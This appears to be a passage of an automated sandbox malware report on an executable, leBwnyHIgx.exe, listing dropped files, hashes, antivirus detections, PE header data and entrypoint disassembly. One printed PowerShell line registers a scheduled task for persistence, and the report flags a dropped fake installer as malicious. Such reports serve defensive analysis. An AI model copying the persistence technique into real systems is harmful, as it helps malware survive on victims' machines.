                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3f2kgilz.y5o.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5e40mvrz.aji.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bteyrahd.zpn.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f3ifemcv.nhm.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gguurgl1.zpk.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_he3vdlw1.h20.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hte1dhgm.nri.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5haeaxe.uic.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j3ane3o0.tdj.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jnfhjw0o.ng2.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jzybxc20.at2.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kefidglv.sql.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ms04uk5e.nkz.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pndpkyw4.sex.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5d3nmnn.sh0.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0rv32ff.ud2.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yox3h2yd.eq0.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\updated.ps1

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\leBwnyHIgx.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):151
                                                                              Entropy (8bit):4.741657013789009
                                                                              Encrypted:false
                                                                              SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                              MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                              SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                              SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                              SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                              Malicious:false
                                                                              Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName

                                                                              C:\Users\user\AppData\Local\updated.ps1

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\leBwnyHIgx.exe
                                                                              File Type:ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):151
                                                                              Entropy (8bit):4.741657013789009
                                                                              Encrypted:false
                                                                              SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                              MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                              SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                              SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                              SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                              Malicious:false
                                                                              Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName

                                                                              C:\Users\user\AppData\Roaming\leBwnyHIgx.exe

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\leBwnyHIgx.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2581432
                                                                              Entropy (8bit):6.402040529665259
                                                                              Encrypted:false
                                                                              SSDEEP:49152:Io/KpmZubPf2S8W2ILeWl+C1p9jWy5Snd0eigXNCM:T/jtYLP1Sy5E0fM
                                                                              MD5:2A7776214C4870137FE8AABB231CF52E
                                                                              SHA1:3134458AD9FF7A6E76543427794FBCEE1D7EDA07
                                                                              SHA-256:51434B554C4E3B123E0A90DB3048EC6D5EDAED4CDB245C8F9E3DBDDB378F2845
                                                                              SHA-512:E519D2D4C92E7EF921231B733EB614B800E9DEBA0DCCDC534A668FB81BF2F925F48E87E5983AC6CCBF026E5109C7EF8E6752E16376305091745289938ECF2839
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 24%
                                                                              Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......^..................%...........%.......%...@.......................... (.......(...@......@....................'.......&..5...0'.U............6'..'................................... '.....................L.&.H.....&......................text.....%.......%................. ..`.itext...&....%..(....%............. ..`.data...dZ....%..\....%.............@....bss.....x...0&..........................idata...5....&..6....&.............@....didata.......&......@&.............@....edata........'......J&.............@..@.tls....D.....'..........................rdata..].... '......L&.............@..@.rsrc...U....0'......N&.............@..@............. (......<'.............@..@........................................................

                                                                              C:\Users\user\AppData\Roaming\leBwnyHIgx.exe:Zone.Identifier

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\leBwnyHIgx.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:true
                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                              C:\Users\user\Downloads\wpsv.5.6.3.exe

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\leBwnyHIgx.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                              Category:modified
                                                                              Size (bytes):3027728
                                                                              Entropy (8bit):7.856503406318228
                                                                              Encrypted:false
                                                                              SSDEEP:49152:sejRVM654Suz/Debm7vpElDBc4uN+C+LHseGi1pm2PfLwUA0EUEiXDSWqf16yag5:sejRVMDhe6yH1ugfHseGKtPDw50E1iTe
                                                                              MD5:B52BA2B99108C496389AE5BB81FA6537
                                                                              SHA1:9073D8C4A1968BE24357862015519F2AFECD833A
                                                                              SHA-256:C6AC7D9ADD40B913112B265D4F366D9EF80BBD711049DB085FC750FCAD4E14D8
                                                                              SHA-512:6637506EE80D359E729E0011B97E8D827E14356393193247F502B7FCFBBCA249DC045B8ACFE4B31CE462468F421DC5D9A4E31183BEDB66C45A9AA43C01F81397
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                              Joe Sandbox View:
                                                                              • Filename: WPS#U529e#U516c#U8f6f#U4ef6 v76.23.66.msi, Detection: malicious, Browse
                                                                              • Filename: fNlAH8RgLk.exe, Detection: malicious, Browse
                                                                              • Filename: fNlAH8RgLk.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......q...5...5...5...n.......n........a/.<......&....../...n...4...n...4..........n.......n...6...5... ...........5...V...............4...5...7.......4...Rich5...........PE..L.....dc..................*.......,..ZW...,..`W...@..........................0Z......s....@.................................T-Z......`W.T.............-..H....Z..............................\W......\W.....................$PD.@...................UPX0......,.............................UPX1......*...,...*.................@....rsrc........`W.......*.............@......................................................................................................................................................................................................................................................................................................................................3.08.UPX!....

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):6.402040529665259
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 98.88%
                                                                              • Inno Setup installer (109748/4) 1.08%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:leBwnyHIgx.exe
                                                                              File size:2'581'432 bytes
                                                                              MD5:2a7776214c4870137fe8aabb231cf52e
                                                                              SHA1:3134458ad9ff7a6e76543427794fbcee1d7eda07
                                                                              SHA256:51434b554c4e3b123e0a90db3048ec6d5edaed4cdb245c8f9e3dbddb378f2845
                                                                              SHA512:e519d2d4c92e7ef921231b733eb614b800e9deba0dccdc534a668fb81bf2f925f48e87e5983ac6ccbf026e5109c7ef8e6752e16376305091745289938ecf2839
                                                                              SSDEEP:49152:Io/KpmZubPf2S8W2ILeWl+C1p9jWy5Snd0eigXNCM:T/jtYLP1Sy5E0fM
                                                                              TLSH:56C54A16B288713ED4EB1B37893386605937B661BA73CC5B5BF02A0C8F355902F3E656
                                                                              File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                              File Icon

                                                                              Icon Hash:3a9c4c6761cc9c31

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x65c4a4
                                                                              Entrypoint Section:.itext
                                                                              Digitally signed:true
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x5EC61809 [Thu May 21 05:56:25 2020 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:6
                                                                              OS Version Minor:0
                                                                              File Version Major:6
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:6
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:16c8c7a62c852018ed02e453e144c998

                                                                              Authenticode Signature

                                                                              Signature Valid:
                                                                              Signature Issuer:
                                                                              Signature Validation Error:
                                                                              Error Number:
                                                                              Not Before, Not After
                                                                                Subject Chain
                                                                                  Version:
                                                                                  Thumbprint MD5:
                                                                                  Thumbprint SHA-1:
                                                                                  Thumbprint SHA-256:
                                                                                  Serial:

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  add esp, FFFFFFF0h
                                                                                  push ebx
                                                                                  push esi
                                                                                  push edi
                                                                                  mov eax, 00651408h
                                                                                  call 00007F18ECF562B2h
                                                                                  mov eax, dword ptr [00662788h]
                                                                                  mov eax, dword ptr [eax]
                                                                                  mov eax, dword ptr [eax+00000188h]
                                                                                  push FFFFFFECh
                                                                                  push eax
                                                                                  call 00007F18ECF5A311h
                                                                                  mov edx, dword ptr [00662788h]
                                                                                  mov edx, dword ptr [edx]
                                                                                  mov edx, dword ptr [edx+00000188h]
                                                                                  and eax, FFFFFF7Fh
                                                                                  push eax
                                                                                  push FFFFFFECh
                                                                                  push edx
                                                                                  call 00007F18ECF5A2FDh
                                                                                  xor eax, eax
                                                                                  push ebp
                                                                                  push 0065C528h
                                                                                  push dword ptr fs:[eax]
                                                                                  mov dword ptr fs:[eax], esp
                                                                                  push 00000001h
                                                                                  call 00007F18ECF59668h
                                                                                  call 00007F18ED198743h
                                                                                  mov eax, dword ptr [00651030h]
                                                                                  push eax
                                                                                  push 006510C8h
                                                                                  mov eax, dword ptr [00662788h]
                                                                                  mov eax, dword ptr [eax]
                                                                                  call 00007F18ED0EA4E8h
                                                                                  call 00007F18ED198797h
                                                                                  xor eax, eax
                                                                                  pop edx
                                                                                  pop ecx
                                                                                  pop ecx
                                                                                  mov dword ptr fs:[eax], edx
                                                                                  jmp 00007F18ED1A3AEBh
                                                                                  jmp 00007F18ECF4F028h
                                                                                  call 00007F18ED1984DFh
                                                                                  mov eax, 00000001h
                                                                                  call 00007F18ECF4FB11h
                                                                                  call 00007F18ECF4F46Ch
                                                                                  mov eax, dword ptr [00662788h]
                                                                                  mov eax, dword ptr [eax]
                                                                                  mov edx, 0065C6BCh
                                                                                  call 00007F18ED0E9FBFh
                                                                                  push 00000005h
                                                                                  mov eax, dword ptr [00662788h]
                                                                                  mov eax, dword ptr [eax]
                                                                                  mov eax, dword ptr [eax+00000188h]
                                                                                  push eax
                                                                                  call 00007F18ECF5A026h
                                                                                  mov eax, dword ptr [00662788h]

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x2700000x97.edata
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x26b0000x35d8.idata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2730000xec55.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x2736000x27b8.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x2720000x18.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x26b94c0x848.idata
